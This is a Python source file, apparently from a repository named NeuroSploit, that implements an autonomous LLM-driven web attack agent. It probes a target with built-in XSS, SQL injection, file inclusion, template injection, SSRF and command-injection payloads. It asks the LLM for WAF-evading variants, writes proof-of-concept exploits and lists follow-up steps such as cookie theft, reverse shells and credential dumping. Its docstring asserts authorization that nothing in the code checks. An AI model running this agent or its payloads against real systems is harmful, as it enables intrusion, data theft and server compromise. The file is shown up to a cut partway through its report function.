mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-13 06:22:44 +00:00
890 lines
34 KiB
Python
890 lines
34 KiB
Python
"""
|
|
NeuroSploit v3 - AI Offensive Security Agent
|
|
|
|
This is a TRUE AI AGENT that:
|
|
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
|
|
2. Analyzes responses with AI to confirm vulnerabilities (no false positives)
|
|
3. Uses recon data to inform testing strategy
|
|
4. Accepts custom .md prompt files
|
|
5. Generates real PoC code and exploitation steps
|
|
|
|
AUTHORIZATION: This is an authorized penetration testing tool.
|
|
All actions are performed with explicit permission.
|
|
"""
|
|
|
|
import asyncio
|
|
import aiohttp
|
|
import json
|
|
import re
|
|
import os
|
|
import sys
|
|
from typing import Dict, List, Any, Optional, Callable, Tuple
|
|
from dataclasses import dataclass, field
|
|
from datetime import datetime
|
|
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
|
|
from enum import Enum
|
|
from pathlib import Path
|
|
|
|
# Add parent path for imports
|
|
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
|
|
|
|
try:
|
|
from core.llm_manager import LLMManager
|
|
except ImportError:
|
|
LLMManager = None
|
|
|
|
|
|
class AgentAction(Enum):
|
|
"""Actions the agent can take"""
|
|
DISCOVER = "discover"
|
|
TEST = "test"
|
|
EXPLOIT = "exploit"
|
|
CHAIN = "chain"
|
|
REPORT = "report"
|
|
PIVOT = "pivot"
|
|
|
|
|
|
@dataclass
|
|
class Finding:
|
|
"""A vulnerability finding with exploitation details"""
|
|
vuln_type: str
|
|
severity: str
|
|
endpoint: str
|
|
payload: str
|
|
evidence: str
|
|
exploitable: bool
|
|
confidence: str = "high" # high, medium, low
|
|
exploitation_steps: List[str] = field(default_factory=list)
|
|
poc_code: str = ""
|
|
impact: str = ""
|
|
chained_with: List[str] = field(default_factory=list)
|
|
raw_request: str = ""
|
|
raw_response: str = ""
|
|
llm_analysis: str = ""
|
|
|
|
|
|
@dataclass
|
|
class AgentState:
|
|
"""Current state of the AI agent"""
|
|
target: str
|
|
discovered_endpoints: List[str] = field(default_factory=list)
|
|
discovered_params: Dict[str, List[str]] = field(default_factory=dict)
|
|
technologies: List[str] = field(default_factory=list)
|
|
findings: List[Finding] = field(default_factory=list)
|
|
tested_payloads: Dict[str, List[str]] = field(default_factory=dict)
|
|
session_cookies: Dict[str, str] = field(default_factory=dict)
|
|
auth_tokens: List[str] = field(default_factory=list)
|
|
waf_detected: bool = False
|
|
waf_type: str = ""
|
|
current_phase: str = "recon"
|
|
actions_taken: List[str] = field(default_factory=list)
|
|
recon_context: Optional[Dict] = None
|
|
|
|
|
|
class AIPentestAgent:
|
|
"""
|
|
Autonomous AI Agent for Offensive Security Testing
|
|
|
|
This agent uses LLM to make INTELLIGENT decisions:
|
|
- What to test based on recon data
|
|
- How to craft context-aware payloads
|
|
- How to analyze responses to CONFIRM vulnerabilities
|
|
- How to chain attacks for maximum impact
|
|
|
|
NO FALSE POSITIVES - Every finding is confirmed by AI analysis.
|
|
"""
|
|
|
|
def __init__(
|
|
self,
|
|
target: str,
|
|
llm_manager: Optional[Any] = None,
|
|
log_callback: Optional[Callable] = None,
|
|
auth_headers: Optional[Dict] = None,
|
|
max_depth: int = 5,
|
|
prompt_file: Optional[str] = None,
|
|
recon_context: Optional[Dict] = None,
|
|
config: Optional[Dict] = None
|
|
):
|
|
self.target = target
|
|
self.llm_manager = llm_manager
|
|
self.log = log_callback or self._default_log
|
|
self.auth_headers = auth_headers or {}
|
|
self.max_depth = max_depth
|
|
self.prompt_file = prompt_file
|
|
self.custom_prompt = None
|
|
self.config = config or {}
|
|
self.state = AgentState(target=target, recon_context=recon_context)
|
|
self.session: Optional[aiohttp.ClientSession] = None
|
|
|
|
# Load custom prompt if provided
|
|
if prompt_file:
|
|
self._load_custom_prompt(prompt_file)
|
|
|
|
# Initialize LLM manager if not provided
|
|
if not self.llm_manager and LLMManager and config:
|
|
try:
|
|
self.llm_manager = LLMManager(config)
|
|
except Exception as e:
|
|
print(f"Warning: Could not initialize LLM manager: {e}")
|
|
|
|
# Base payloads - LLM will enhance these based on context
|
|
self.base_payloads = self._load_base_payloads()
|
|
|
|
async def _default_log(self, level: str, message: str):
|
|
print(f"[{level.upper()}] {message}")
|
|
|
|
def _load_custom_prompt(self, prompt_file: str):
|
|
"""Load custom prompt from .md file"""
|
|
try:
|
|
path = Path(prompt_file)
|
|
if not path.exists():
|
|
# Try in prompts directory
|
|
path = Path("prompts") / prompt_file
|
|
if not path.exists():
|
|
path = Path("prompts/md_library") / prompt_file
|
|
|
|
if path.exists():
|
|
content = path.read_text()
|
|
self.custom_prompt = content
|
|
print(f"[+] Loaded custom prompt from: {path}")
|
|
else:
|
|
print(f"[!] Prompt file not found: {prompt_file}")
|
|
except Exception as e:
|
|
print(f"[!] Error loading prompt file: {e}")
|
|
|
|
def _load_base_payloads(self) -> Dict[str, List[str]]:
|
|
"""Load base attack payloads - LLM will enhance these"""
|
|
return {
|
|
"xss": [
|
|
"<script>alert(1)</script>",
|
|
"\"><script>alert(1)</script>",
|
|
"'-alert(1)-'",
|
|
"<img src=x onerror=alert(1)>",
|
|
],
|
|
"sqli": [
|
|
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
|
|
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
|
|
],
|
|
"lfi": [
|
|
"../../../etc/passwd",
|
|
"....//....//etc/passwd",
|
|
"php://filter/convert.base64-encode/resource=index.php",
|
|
],
|
|
"ssti": [
|
|
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
|
|
"{{config}}", "{{self.__class__}}",
|
|
],
|
|
"ssrf": [
|
|
"http://127.0.0.1", "http://localhost",
|
|
"http://169.254.169.254/latest/meta-data/",
|
|
],
|
|
"rce": [
|
|
"; id", "| id", "$(id)", "`id`",
|
|
],
|
|
}
|
|
|
|
async def __aenter__(self):
|
|
connector = aiohttp.TCPConnector(ssl=False, limit=10)
|
|
timeout = aiohttp.ClientTimeout(total=30)
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
|
|
headers.update(self.auth_headers)
|
|
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout, headers=headers)
|
|
return self
|
|
|
|
async def __aexit__(self, *args):
|
|
if self.session:
|
|
await self.session.close()
|
|
|
|
async def run(self) -> Dict[str, Any]:
|
|
"""
|
|
Main agent loop - Think, Act, Observe, Adapt
|
|
|
|
Uses LLM for intelligent decision making at each step.
|
|
"""
|
|
await self.log("info", "=" * 60)
|
|
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
|
|
await self.log("info", "=" * 60)
|
|
await self.log("info", f"Target: {self.target}")
|
|
await self.log("info", f"Mode: LLM-POWERED INTELLIGENT TESTING")
|
|
if self.custom_prompt:
|
|
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
|
|
await self.log("info", "")
|
|
|
|
try:
|
|
# Phase 1: Reconnaissance (use recon data if available)
|
|
await self.log("info", "[PHASE 1] RECONNAISSANCE")
|
|
await self._recon_phase()
|
|
|
|
# Phase 2: LLM-Powered Vulnerability Testing
|
|
await self.log("info", "")
|
|
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
|
|
await self._testing_phase()
|
|
|
|
# Phase 3: Exploitation (only confirmed vulnerabilities)
|
|
if self.state.findings:
|
|
await self.log("info", "")
|
|
await self.log("info", "[PHASE 3] EXPLOITATION")
|
|
await self._exploitation_phase()
|
|
|
|
# Phase 4: Attack Chaining
|
|
if len(self.state.findings) > 1:
|
|
await self.log("info", "")
|
|
await self.log("info", "[PHASE 4] ATTACK CHAINING")
|
|
await self._chaining_phase()
|
|
|
|
# Generate Report
|
|
await self.log("info", "")
|
|
await self.log("info", "[PHASE 5] REPORT GENERATION")
|
|
report = await self._generate_report()
|
|
|
|
return report
|
|
|
|
except Exception as e:
|
|
await self.log("error", f"Agent error: {str(e)}")
|
|
import traceback
|
|
traceback.print_exc()
|
|
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
|
|
|
|
async def _recon_phase(self):
|
|
"""Reconnaissance - use existing recon data or perform basic discovery"""
|
|
|
|
# Use recon context if available
|
|
if self.state.recon_context:
|
|
await self.log("info", " Using provided recon context...")
|
|
await self._load_recon_context()
|
|
else:
|
|
await self.log("info", " Performing basic reconnaissance...")
|
|
await self._basic_recon()
|
|
|
|
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
|
|
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
|
|
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
|
|
|
|
async def _load_recon_context(self):
|
|
"""Load data from recon context"""
|
|
ctx = self.state.recon_context
|
|
|
|
# Load endpoints from various recon sources
|
|
if ctx.get("data", {}).get("endpoints"):
|
|
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
|
|
|
|
if ctx.get("data", {}).get("urls"):
|
|
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
|
|
|
|
if ctx.get("data", {}).get("crawled_urls"):
|
|
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
|
|
|
|
# Load parameters
|
|
if ctx.get("data", {}).get("parameters"):
|
|
for param_data in ctx["data"]["parameters"]:
|
|
if isinstance(param_data, dict):
|
|
url = param_data.get("url", self.target)
|
|
params = param_data.get("params", [])
|
|
self.state.discovered_params[url] = params
|
|
elif isinstance(param_data, str):
|
|
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
|
|
|
|
# Load technologies
|
|
if ctx.get("data", {}).get("technologies"):
|
|
self.state.technologies.extend(ctx["data"]["technologies"])
|
|
|
|
# Load from attack surface
|
|
if ctx.get("attack_surface"):
|
|
surface = ctx["attack_surface"]
|
|
if surface.get("live_hosts"):
|
|
for host in surface.get("live_urls", [])[:50]:
|
|
if host not in self.state.discovered_endpoints:
|
|
self.state.discovered_endpoints.append(host)
|
|
|
|
# Deduplicate
|
|
self.state.discovered_endpoints = list(set(self.state.discovered_endpoints))
|
|
|
|
async def _basic_recon(self):
|
|
"""Perform basic reconnaissance when no recon data is available"""
|
|
# Fingerprint
|
|
await self._fingerprint_target()
|
|
|
|
# Discover common endpoints
|
|
common_paths = [
|
|
"/", "/login", "/admin", "/api", "/api/v1",
|
|
"/user", "/search", "/upload", "/config",
|
|
"/?id=1", "/?page=1", "/?q=test",
|
|
]
|
|
|
|
parsed = urlparse(self.target)
|
|
base_url = f"{parsed.scheme}://{parsed.netloc}"
|
|
|
|
for path in common_paths:
|
|
url = urljoin(base_url, path)
|
|
try:
|
|
async with self.session.get(url, allow_redirects=False) as resp:
|
|
if resp.status < 400 and resp.status != 404:
|
|
self.state.discovered_endpoints.append(url)
|
|
# Extract params
|
|
if "?" in url:
|
|
parsed_url = urlparse(url)
|
|
params = list(parse_qs(parsed_url.query).keys())
|
|
self.state.discovered_params[url] = params
|
|
except:
|
|
pass
|
|
|
|
async def _fingerprint_target(self):
|
|
"""Fingerprint the target"""
|
|
try:
|
|
async with self.session.get(self.target) as resp:
|
|
body = await resp.text()
|
|
headers = dict(resp.headers)
|
|
|
|
# Server detection
|
|
server = headers.get("Server", "")
|
|
if server:
|
|
self.state.technologies.append(f"Server: {server}")
|
|
|
|
# X-Powered-By
|
|
powered = headers.get("X-Powered-By", "")
|
|
if powered:
|
|
self.state.technologies.append(powered)
|
|
|
|
# Technology signatures
|
|
tech_sigs = {
|
|
"PHP": [".php", "PHPSESSID"],
|
|
"ASP.NET": [".aspx", "__VIEWSTATE"],
|
|
"Java": [".jsp", "JSESSIONID"],
|
|
"Python": ["django", "flask"],
|
|
"Node.js": ["express", "connect.sid"],
|
|
"WordPress": ["wp-content", "wp-includes"],
|
|
"Laravel": ["laravel", "XSRF-TOKEN"],
|
|
}
|
|
|
|
for tech, sigs in tech_sigs.items():
|
|
for sig in sigs:
|
|
if sig.lower() in body.lower() or sig in str(headers):
|
|
if tech not in self.state.technologies:
|
|
self.state.technologies.append(tech)
|
|
break
|
|
|
|
except Exception as e:
|
|
await self.log("debug", f"Fingerprint error: {e}")
|
|
|
|
async def _testing_phase(self):
|
|
"""LLM-powered vulnerability testing"""
|
|
|
|
# Determine what to test based on recon data
|
|
test_strategy = await self._get_test_strategy()
|
|
|
|
# Get endpoints to test
|
|
endpoints = self.state.discovered_endpoints[:20] or [self.target]
|
|
|
|
for endpoint in endpoints:
|
|
await self.log("info", f" Testing: {endpoint[:60]}...")
|
|
|
|
for vuln_type in test_strategy:
|
|
# Get LLM-enhanced payloads for this context
|
|
payloads = await self._get_smart_payloads(endpoint, vuln_type)
|
|
|
|
for payload in payloads[:5]:
|
|
result = await self._test_and_verify(endpoint, vuln_type, payload)
|
|
|
|
if result and result.get("confirmed"):
|
|
finding = Finding(
|
|
vuln_type=vuln_type,
|
|
severity=self._get_severity(vuln_type),
|
|
endpoint=endpoint,
|
|
payload=payload,
|
|
evidence=result.get("evidence", ""),
|
|
exploitable=result.get("exploitable", False),
|
|
confidence=result.get("confidence", "high"),
|
|
llm_analysis=result.get("analysis", ""),
|
|
raw_request=result.get("request", ""),
|
|
raw_response=result.get("response", "")[:2000],
|
|
impact=self._get_impact(vuln_type),
|
|
)
|
|
self.state.findings.append(finding)
|
|
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
|
|
break # Found vuln, move to next type
|
|
|
|
async def _get_test_strategy(self) -> List[str]:
|
|
"""Use LLM to determine what to test based on recon data"""
|
|
|
|
# Default strategy
|
|
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
|
|
|
|
if not self.llm_manager:
|
|
return default_strategy
|
|
|
|
try:
|
|
# Build context for LLM
|
|
context = {
|
|
"target": self.target,
|
|
"technologies": self.state.technologies,
|
|
"endpoints_count": len(self.state.discovered_endpoints),
|
|
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
|
|
"sample_endpoints": self.state.discovered_endpoints[:5],
|
|
}
|
|
|
|
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
|
|
|
|
Target: {context['target']}
|
|
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
|
|
Endpoints found: {context['endpoints_count']}
|
|
Parameters found: {context['parameters_count']}
|
|
Sample endpoints: {context['sample_endpoints']}
|
|
|
|
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
|
|
|
|
Return a JSON array of vulnerability types to test, ordered by likelihood.
|
|
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
|
|
|
|
Example: ["sqli", "xss", "lfi"]
|
|
|
|
IMPORTANT: Only return the JSON array, no other text."""
|
|
|
|
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
|
|
|
|
# Parse response
|
|
try:
|
|
# Find JSON array in response
|
|
match = re.search(r'\[.*?\]', response, re.DOTALL)
|
|
if match:
|
|
strategy = json.loads(match.group())
|
|
if isinstance(strategy, list) and len(strategy) > 0:
|
|
return strategy[:7]
|
|
except:
|
|
pass
|
|
|
|
except Exception as e:
|
|
await self.log("debug", f"LLM strategy error: {e}")
|
|
|
|
return default_strategy
|
|
|
|
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
|
|
"""Get context-aware payloads from LLM"""
|
|
|
|
base = self.base_payloads.get(vuln_type, [])
|
|
|
|
if not self.llm_manager:
|
|
return base
|
|
|
|
try:
|
|
# Get endpoint context
|
|
params = self.state.discovered_params.get(endpoint, [])
|
|
techs = self.state.technologies
|
|
|
|
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
|
|
|
|
Endpoint: {endpoint}
|
|
Parameters: {params}
|
|
Technologies: {techs}
|
|
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
|
|
|
|
Requirements:
|
|
1. Payloads should be tailored to the detected technologies
|
|
2. If WAF detected, use evasion techniques
|
|
3. Include both basic and advanced payloads
|
|
|
|
Return ONLY a JSON array of payload strings.
|
|
Example: ["payload1", "payload2", "payload3"]"""
|
|
|
|
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
|
|
|
|
try:
|
|
match = re.search(r'\[.*?\]', response, re.DOTALL)
|
|
if match:
|
|
smart_payloads = json.loads(match.group())
|
|
if isinstance(smart_payloads, list):
|
|
return smart_payloads + base
|
|
except:
|
|
pass
|
|
|
|
except Exception as e:
|
|
await self.log("debug", f"Smart payload error: {e}")
|
|
|
|
return base
|
|
|
|
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
|
|
"""Test a payload and use LLM to verify if it's a real vulnerability"""
|
|
|
|
try:
|
|
# Prepare request
|
|
parsed = urlparse(endpoint)
|
|
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
|
|
|
|
# Build params with payload
|
|
params = {}
|
|
if parsed.query:
|
|
for p in parsed.query.split("&"):
|
|
if "=" in p:
|
|
k, v = p.split("=", 1)
|
|
params[k] = payload
|
|
else:
|
|
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
|
|
for p in test_params[:3]:
|
|
params[p] = payload
|
|
|
|
# Send request
|
|
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
|
|
body = await resp.text()
|
|
status = resp.status
|
|
headers = dict(resp.headers)
|
|
|
|
# Build raw request for logging
|
|
raw_request = f"GET {resp.url}\n"
|
|
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
|
|
|
|
# First, do quick checks for obvious indicators
|
|
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
|
|
|
|
if not quick_result.get("possible"):
|
|
return None
|
|
|
|
# If possible vulnerability, use LLM to confirm
|
|
if self.llm_manager:
|
|
confirmation = await self._llm_confirm_vulnerability(
|
|
vuln_type, payload, body[:3000], status, headers, endpoint
|
|
)
|
|
if confirmation.get("confirmed"):
|
|
return {
|
|
"confirmed": True,
|
|
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
|
|
"exploitable": confirmation.get("exploitable", False),
|
|
"confidence": confirmation.get("confidence", "medium"),
|
|
"analysis": confirmation.get("analysis", ""),
|
|
"request": raw_request,
|
|
"response": body[:2000],
|
|
}
|
|
else:
|
|
# No LLM, use quick check result
|
|
if quick_result.get("high_confidence"):
|
|
return {
|
|
"confirmed": True,
|
|
"evidence": quick_result.get("evidence", ""),
|
|
"exploitable": True,
|
|
"confidence": "medium",
|
|
"analysis": "Confirmed by response analysis (no LLM)",
|
|
"request": raw_request,
|
|
"response": body[:2000],
|
|
}
|
|
|
|
except asyncio.TimeoutError:
|
|
if vuln_type == "sqli":
|
|
return {
|
|
"confirmed": True,
|
|
"evidence": "Request timeout - possible time-based SQL injection",
|
|
"exploitable": True,
|
|
"confidence": "medium",
|
|
"analysis": "Time-based blind SQLi detected",
|
|
}
|
|
except Exception as e:
|
|
await self.log("debug", f"Test error: {e}")
|
|
|
|
return None
|
|
|
|
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
|
|
"""Quick vulnerability check without LLM"""
|
|
result = {"possible": False, "high_confidence": False, "evidence": ""}
|
|
body_lower = body.lower()
|
|
|
|
if vuln_type == "xss":
|
|
# Check for exact payload reflection (unencoded)
|
|
if payload in body and "<" in payload:
|
|
result["possible"] = True
|
|
result["evidence"] = "XSS payload reflected without encoding"
|
|
# High confidence only if script tags execute
|
|
if "<script>" in payload.lower() and payload.lower() in body_lower:
|
|
result["high_confidence"] = True
|
|
|
|
elif vuln_type == "sqli":
|
|
sql_errors = [
|
|
"sql syntax", "mysql_", "sqlite_", "pg_query", "ora-",
|
|
"unterminated", "query failed", "database error",
|
|
"you have an error in your sql", "warning: mysql",
|
|
]
|
|
for error in sql_errors:
|
|
if error in body_lower:
|
|
result["possible"] = True
|
|
result["high_confidence"] = True
|
|
result["evidence"] = f"SQL error: {error}"
|
|
break
|
|
|
|
elif vuln_type == "lfi":
|
|
lfi_indicators = ["root:x:", "root:*:", "[boot loader]", "daemon:", "/bin/bash"]
|
|
for indicator in lfi_indicators:
|
|
if indicator.lower() in body_lower:
|
|
result["possible"] = True
|
|
result["high_confidence"] = True
|
|
result["evidence"] = f"File content: {indicator}"
|
|
break
|
|
|
|
elif vuln_type == "ssti":
|
|
if "49" in body and "7*7" in payload:
|
|
result["possible"] = True
|
|
result["high_confidence"] = True
|
|
result["evidence"] = "SSTI: 7*7=49 evaluated"
|
|
|
|
elif vuln_type == "rce":
|
|
rce_indicators = ["uid=", "gid=", "groups=", "/bin/", "/usr/"]
|
|
for indicator in rce_indicators:
|
|
if indicator in body_lower:
|
|
result["possible"] = True
|
|
result["high_confidence"] = True
|
|
result["evidence"] = f"Command output: {indicator}"
|
|
break
|
|
|
|
elif vuln_type == "ssrf":
|
|
ssrf_indicators = ["root:", "localhost", "internal", "meta-data", "169.254"]
|
|
for indicator in ssrf_indicators:
|
|
if indicator in body_lower:
|
|
result["possible"] = True
|
|
result["evidence"] = f"Internal content: {indicator}"
|
|
break
|
|
|
|
return result
|
|
|
|
async def _llm_confirm_vulnerability(
|
|
self, vuln_type: str, payload: str, body: str, status: int, headers: Dict, endpoint: str
|
|
) -> Dict:
|
|
"""Use LLM to confirm if a vulnerability is real"""
|
|
|
|
prompt = f"""Analyze this HTTP response to determine if there is a REAL {vuln_type.upper()} vulnerability.
|
|
|
|
IMPORTANT: Only confirm if you are CERTAIN. Avoid false positives.
|
|
|
|
Endpoint: {endpoint}
|
|
Payload sent: {payload}
|
|
HTTP Status: {status}
|
|
Response headers: {json.dumps(dict(list(headers.items())[:10]))}
|
|
Response body (truncated): {body[:2000]}
|
|
|
|
Analyze and respond with JSON:
|
|
{{
|
|
"confirmed": true/false,
|
|
"confidence": "high"/"medium"/"low",
|
|
"evidence": "specific evidence from response",
|
|
"exploitable": true/false,
|
|
"analysis": "brief explanation"
|
|
}}
|
|
|
|
CRITICAL RULES:
|
|
1. For XSS: Payload must be reflected WITHOUT encoding in a context where it executes
|
|
2. For SQLi: Must see actual SQL error messages, not just reflected input
|
|
3. For LFI: Must see actual file contents (like /etc/passwd)
|
|
4. For SSTI: Math expressions must be EVALUATED (49 for 7*7)
|
|
5. For RCE: Must see command output (uid=, /bin/, etc.)
|
|
|
|
If uncertain, set confirmed=false. Better to miss a vuln than report false positive."""
|
|
|
|
try:
|
|
response = self.llm_manager.generate(
|
|
prompt,
|
|
"You are a security expert. Analyze HTTP responses to confirm vulnerabilities. Be precise and avoid false positives."
|
|
)
|
|
|
|
# Parse JSON response
|
|
match = re.search(r'\{.*?\}', response, re.DOTALL)
|
|
if match:
|
|
result = json.loads(match.group())
|
|
return result
|
|
|
|
except Exception as e:
|
|
await self.log("debug", f"LLM confirmation error: {e}")
|
|
|
|
return {"confirmed": False}
|
|
|
|
def _get_severity(self, vuln_type: str) -> str:
|
|
"""Get severity based on vulnerability type"""
|
|
severity_map = {
|
|
"rce": "critical",
|
|
"sqli": "critical",
|
|
"ssti": "critical",
|
|
"lfi": "high",
|
|
"ssrf": "high",
|
|
"xss": "high",
|
|
"xxe": "high",
|
|
"idor": "medium",
|
|
"open_redirect": "medium",
|
|
}
|
|
return severity_map.get(vuln_type, "medium")
|
|
|
|
def _get_impact(self, vuln_type: str) -> str:
|
|
"""Get impact description"""
|
|
impact_map = {
|
|
"rce": "Remote Code Execution - Full server compromise",
|
|
"sqli": "SQL Injection - Database compromise, data theft",
|
|
"ssti": "Server-Side Template Injection - RCE possible",
|
|
"lfi": "Local File Inclusion - Sensitive data exposure",
|
|
"ssrf": "Server-Side Request Forgery - Internal network access",
|
|
"xss": "Cross-Site Scripting - Session hijacking",
|
|
"xxe": "XML External Entity - Data theft, SSRF",
|
|
"idor": "Insecure Direct Object Reference - Data access",
|
|
"open_redirect": "Open Redirect - Phishing attacks",
|
|
}
|
|
return impact_map.get(vuln_type, "Security vulnerability")
|
|
|
|
async def _exploitation_phase(self):
|
|
"""Generate PoC code for confirmed vulnerabilities"""
|
|
await self.log("info", f" Generating PoC for {len(self.state.findings)} confirmed vulnerabilities...")
|
|
|
|
for finding in self.state.findings:
|
|
if finding.exploitable:
|
|
poc = await self._generate_poc(finding)
|
|
finding.poc_code = poc
|
|
finding.exploitation_steps = self._get_exploitation_steps(finding)
|
|
await self.log("info", f" PoC generated for {finding.vuln_type}")
|
|
|
|
async def _generate_poc(self, finding: Finding) -> str:
|
|
"""Generate PoC code using LLM if available"""
|
|
|
|
if self.llm_manager:
|
|
try:
|
|
prompt = f"""Generate a Python proof-of-concept exploit for this vulnerability:
|
|
|
|
Type: {finding.vuln_type}
|
|
Endpoint: {finding.endpoint}
|
|
Payload: {finding.payload}
|
|
Evidence: {finding.evidence}
|
|
|
|
Create a working Python script that:
|
|
1. Demonstrates the vulnerability
|
|
2. Includes proper error handling
|
|
3. Has comments explaining each step
|
|
4. Is safe to run (no destructive actions)
|
|
|
|
Return ONLY the Python code, no explanations."""
|
|
|
|
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate safe, educational PoC code.")
|
|
|
|
# Extract code block
|
|
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
|
|
if code_match:
|
|
return code_match.group(1)
|
|
elif "import" in response:
|
|
return response
|
|
|
|
except Exception as e:
|
|
await self.log("debug", f"PoC generation error: {e}")
|
|
|
|
# Fallback to template
|
|
return self._get_poc_template(finding)
|
|
|
|
def _get_poc_template(self, finding: Finding) -> str:
|
|
"""Get PoC template for a vulnerability"""
|
|
return f'''#!/usr/bin/env python3
|
|
"""
|
|
{finding.vuln_type.upper()} Proof of Concept
|
|
Target: {finding.endpoint}
|
|
Generated by NeuroSploit AI Agent
|
|
"""
|
|
|
|
import requests
|
|
|
|
def exploit():
|
|
url = "{finding.endpoint}"
|
|
payload = "{finding.payload}"
|
|
|
|
response = requests.get(url, params={{"test": payload}})
|
|
print(f"Status: {{response.status_code}}")
|
|
print(f"Vulnerable: {{{repr(finding.evidence)}}} in response.text")
|
|
|
|
if __name__ == "__main__":
|
|
exploit()
|
|
'''
|
|
|
|
def _get_exploitation_steps(self, finding: Finding) -> List[str]:
|
|
"""Get exploitation steps for a vulnerability"""
|
|
steps_map = {
|
|
"xss": [
|
|
"1. Confirm XSS with alert(document.domain)",
|
|
"2. Craft cookie stealing payload",
|
|
"3. Host attacker server to receive cookies",
|
|
"4. Send malicious link to victim",
|
|
],
|
|
"sqli": [
|
|
"1. Confirm injection with error-based payloads",
|
|
"2. Enumerate database with UNION SELECT",
|
|
"3. Extract table names from information_schema",
|
|
"4. Dump sensitive data (credentials, PII)",
|
|
],
|
|
"lfi": [
|
|
"1. Confirm LFI with /etc/passwd",
|
|
"2. Read application source code",
|
|
"3. Extract credentials from config files",
|
|
"4. Attempt log poisoning for RCE",
|
|
],
|
|
"rce": [
|
|
"1. CRITICAL - Confirm command execution",
|
|
"2. Establish reverse shell",
|
|
"3. Enumerate system and network",
|
|
"4. Escalate privileges",
|
|
],
|
|
}
|
|
return steps_map.get(finding.vuln_type, ["1. Investigate further", "2. Attempt exploitation"])
|
|
|
|
async def _chaining_phase(self):
|
|
"""Analyze potential attack chains"""
|
|
await self.log("info", " Analyzing attack chain possibilities...")
|
|
|
|
vuln_types = [f.vuln_type for f in self.state.findings]
|
|
|
|
if "xss" in vuln_types:
|
|
await self.log("info", " Chain: XSS -> Session Hijacking -> Account Takeover")
|
|
|
|
if "sqli" in vuln_types:
|
|
await self.log("info", " Chain: SQLi -> Data Extraction -> Credential Theft")
|
|
if "lfi" in vuln_types:
|
|
await self.log("info", " Chain: SQLi + LFI -> Database File Read -> RCE via INTO OUTFILE")
|
|
|
|
if "ssrf" in vuln_types:
|
|
await self.log("info", " Chain: SSRF -> Cloud Metadata -> AWS Keys -> Full Compromise")
|
|
|
|
async def _generate_report(self) -> Dict[str, Any]:
|
|
"""Generate comprehensive report"""
|
|
|
|
report = {
|
|
"target": self.target,
|
|
"scan_date": datetime.utcnow().isoformat(),
|
|
"agent": "NeuroSploit AI Agent v3",
|
|
"mode": "LLM-powered intelligent testing",
|
|
"llm_enabled": self.llm_manager is not None,
|
|
"summary": {
|
|
"total_endpoints": len(self.state.discovered_endpoints),
|
|
"total_parameters": sum(len(v) for v in self.state.discovered_params.values()),
|
|
"total_vulnerabilities": len(self.state.findings),
|
|
"critical": len([f for f in self.state.findings if f.severity == "critical"]),
|
|
"high": len([f for f in self.state.findings if f.severity == "high"]),
|
|
"medium": len([f for f in self.state.findings if f.severity == "medium"]),
|
|
"low": len([f for f in self.state.findings if f.severity == "low"]),
|
|
"technologies": self.state.technologies,
|
|
},
|
|
"findings": [],
|
|
"recommendations": [],
|
|
}
|
|
|
|
for finding in self.state.findings:
|
|
report["findings"].append({
|
|
"type": finding.vuln_type,
|
|
"severity": finding.severity,
|
|
"confidence": finding.confidence,
|
|
"endpoint": finding.endpoint,
|
|
"payload": finding.payload,
|
|
"evidence": finding.evidence,
|
|
"impact": finding.impact,
|
|
"exploitable": finding.exploitable,
|
|
"exploitation_steps": finding.exploitation_steps,
|
|
"poc_code": finding.poc_code,
|
|
"llm_analysis": finding.llm_analysis,
|
|
})
|
|
|
|
# Log summary
|
|
await self.log("info", "=" * 60)
|
|
await self.log("info", "REPORT SUMMARY")
|
|
await self.log("info", "=" * 60)
|
|
await self.log("info", f"Confirmed Vulnerabilities: {len(self.state.findings)}")
|
|
await self.log("info", f" Critical: {report['summary']['critical']}")
|
|
await self.log("info", f" High: {report['summary']['high']}")
|
|
